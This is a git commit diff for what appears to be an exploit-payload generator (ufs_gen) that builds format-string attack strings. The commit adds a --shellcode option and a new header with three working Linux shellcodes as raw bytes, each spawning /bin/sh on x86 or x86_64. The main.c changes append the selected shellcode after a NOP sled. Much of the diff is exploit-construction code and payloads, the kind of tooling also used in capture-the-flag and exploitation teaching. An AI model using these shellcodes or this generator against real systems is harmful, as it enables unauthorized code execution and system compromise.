add the option --shellcode

the user is now able to get a list of common shellcodes to append
between the null bytes and the suffix

closes #1

3 files changed, 145 insertions, 9 deletions

diff --git a/NEWS b/NEWS
new file mode 100644
index 0000000..93309ae
--- /dev/null
+++ b/NEWS
@@ -0,0 +1,3 @@
+01/27/14
+The support of the option --shellcode has been implemented.
+When the user specifies this option, a list of common shellcodes is displayed and the user is able to select one of them.
diff --git a/main.c b/main.c
index 1c4bc17..30605f1 100644
--- a/main.c
+++ b/main.c
@@ -24,6 +24,7 @@
 #include <stdio.h>
 #include <getopt.h>
 
+#include "shellcodes.h"
 
 static unsigned char payload[4096];
 
@@ -48,6 +49,11 @@ static char *suffix_g = NULL;
 /* how many NOP bytes (0x90) shall we append before suffix */
 static int suffix_nops_g = 0;
 
+/* shall we display a menu with the possible shellcodes ? */
+static bool select_shellcode_g = false;
+
+static char *shellcode_g = NULL;
+
     __attribute__((noreturn))
 static void usage(const char *arg0)
 {
@@ -57,7 +63,9 @@ static void usage(const char *arg0)
     fputs(
             "ufs_gen "
             "[--prefix pfx] [--suffix sfx] [--sfxnops n]\n"
-            "        --override addr --with addr --stackidx idx\n", stderr);
+            "        --override addr --with addr --stackidx idx\n"
+            "        --shellcode\n"
+            , stderr);
 
     exit(EX_USAGE);
 }
@@ -82,16 +90,18 @@ static int parse_arguments(int argc, char *argv[])
             OPT_PREFIX,
             OPT_SUFFIX,
             OPT_SFX_NOPS,
+            OPT_SHELLCODE,
         };
 
         static struct option long_options[] = {
-            {"override", required_argument, 0, OPT_OVERRIDE},
-            {"with",     required_argument, 0, OPT_WITH},
-            {"stackidx", required_argument, 0, OPT_STACKIDX},
-            {"addrsize", required_argument, 0, OPT_ADDR_SIZE},
-            {"prefix",   required_argument, 0, OPT_PREFIX},
-            {"suffix",   required_argument, 0, OPT_SUFFIX},
-            {"sfxnops",  required_argument, 0, OPT_SFX_NOPS},
+            {"override",  required_argument, 0, OPT_OVERRIDE},
+            {"with",      required_argument, 0, OPT_WITH},
+            {"stackidx",  required_argument, 0, OPT_STACKIDX},
+            {"addrsize",  required_argument, 0, OPT_ADDR_SIZE},
+            {"prefix",    required_argument, 0, OPT_PREFIX},
+            {"suffix",    required_argument, 0, OPT_SUFFIX},
+            {"sfxnops",   required_argument, 0, OPT_SFX_NOPS},
+            {"shellcode", no_argument,       0, OPT_SHELLCODE},
         };
 
         int option_index;
@@ -131,6 +141,9 @@ static int parse_arguments(int argc, char *argv[])
             case OPT_SFX_NOPS:
                 suffix_nops_g = atoi(optarg);
                 break;
+            case OPT_SHELLCODE:
+                select_shellcode_g = true;
+                break;
             default:
                 /*
                  * we must have accessed an option which we do not have
@@ -198,6 +211,30 @@ int main(int argc, char *argv[])
         usage(argv[0]);
     }
 
+    if (select_shellcode_g) {
+        for (;;) {
+            char buffer[256];
+            int sel;
+
+            /* display the name of the common shellcodes */
+            for (int _i = 0; _i < SHELLCODE_COUNT; ++_i) {
+                fprintf(stderr, "%02d - %s\n", _i + 1, common_shellcodes_g[_i].name);
+            }
+            fputs("select a shellcode. CTRL-D for no shellcode: ", stderr);
+
+            if (fgets(buffer, sizeof(buffer), stdin) == NULL)
+                break;
+
+            /* check if the selection is valid */
+            sel = atoi(buffer);
+            if (sel <= 0 || sel > SHELLCODE_COUNT)
+                continue;
+
+            shellcode_g = common_shellcodes_g[sel - 1].payload;
+            break;
+        }
+    }
+
     if (prefix_g != NULL) {
         int len_pfx = strlen(prefix_g);
         int mod_len_pfx = len_pfx % address_size_g;
@@ -242,11 +279,23 @@ int main(int argc, char *argv[])
         ++idx_stack_g;
     }
 
-    fprintf(stderr, "NOP bytes are at offset %d (%#x)\n", i, i);
+    /* append the NOP bytes */
+    if (suffix_nops_g > 0) {
+        fprintf(stderr, "NOP bytes are at offset %d (%#x)\n", i, i);
+    }
     for (int nop = 0; nop < suffix_nops_g; ++nop) {
         payload[i++] = '\x90';
     }
 
+    /* append the shellcode */
+    if (shellcode_g != NULL) {
+        fprintf(stderr, "shellcode is at offset %d (%#x)\n", i, i);
+        int len_shellcode = strlen(shellcode_g);
+
+        memcpy(payload + i, shellcode_g, len_shellcode);
+        i += len_shellcode;
+    }
+
     if (suffix_g != NULL) {
         fprintf(stderr, "suffix is at offset %d (%#x)\n", i, i);
         int len_suffix = strlen(suffix_g);
diff --git a/shellcodes.h b/shellcodes.h
new file mode 100644
index 0000000..679a0d9
--- /dev/null
+++ b/shellcodes.h
@@ -0,0 +1,84 @@
+/*
+ * Copyright (C) 2014 Olivier Gayot
+ *
+ * This program is free software; you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation; either version 2 of the License, or
+ * (at your option) any later version.
+
+ * This program is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+
+ * You should have received a copy of the GNU General Public License along
+ * with this program; if not, write to the Free Software Foundation, Inc.,
+ * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+ */
+
+#ifndef SHELLCODES_H
+#define SHELLCODES_H
+
+typedef struct {
+    char *name;
+    char *payload;
+} shellcode_t;
+
+shellcode_t common_shellcodes_g[] = {
+    {
+        .name = "Linux x86\n"
+            "\texecve(\"/bin/sh\", 0, 0)",
+        .payload = "\x68\x2f\x73\x68\xff"
+            "\xfe\x44\x24\x03"
+            "\x68\x2f\x62\x69\x6e"
+            "\x31\xc0"
+            "\xb0\x0b"
+            "\x89\xe3"
+            "\x31\xc9"
+            "\x31\xd2"
+            "\xcd\x80"
+    }, {
+        .name = "Linux x86\n"
+            "\tclose(0); open(\"/dev/tty\", 0); execve(\"/bin/sh\", 0, 0)",
+        .payload = "\x83\xec\x09"
+            "\x31\xc0"
+            "\xb0\x06"
+            "\x31\xdb"
+            "\xcd\x80"
+            "\xc7\x04\x24\x2f\x64\x65\x76"
+            "\xc7\x44\x24\x04\x2f\x74\x74\x79"
+            "\xc0\x6c\x24\x08\x08"
+            "\x31\xc0"
+            "\xb0\x05"
+            "\x89\xe3"
+            "\x31\xc9"
+            "\xcd\x80"
+            "\xc7\x04\x24\x2f\x62\x69\x6e"
+            "\xc7\x44\x24\x04\xff\x2f\x73\x68"
+            "\xb0\x0b"
+            "\x89\xe3"
+            "\xc1\x6b\x04\x08"
+            "\x31\xc9"
+            "\x31\xd2"
+            "\xcd\x80"
+    }, {
+        .name = "Linux x86_64\n"
+            "\texecve(\"/bin/sh\", 0, 0)",
+        .payload = "\x68\x2f\x62\x69\x6e"
+            "\xc7\x44\x24\x04\x2f\x73\x68"
+            "\xff"
+            "\xfe\x44\x24\x07"
+            "\x48\x31\xc0"
+            "\xb0\x3b"
+            "\x48\x89\xe7"
+            "\x48\x31\xf6"
+            "\x48\x31\xd2"
+            "\x0f\x05"
+    },
+};
+
+#define SHELLCODE_COUNT \
+    ((int)(sizeof(common_shellcodes_g) / sizeof(common_shellcodes_g[0])))
+
+
+#endif /* SHELLCODES_H */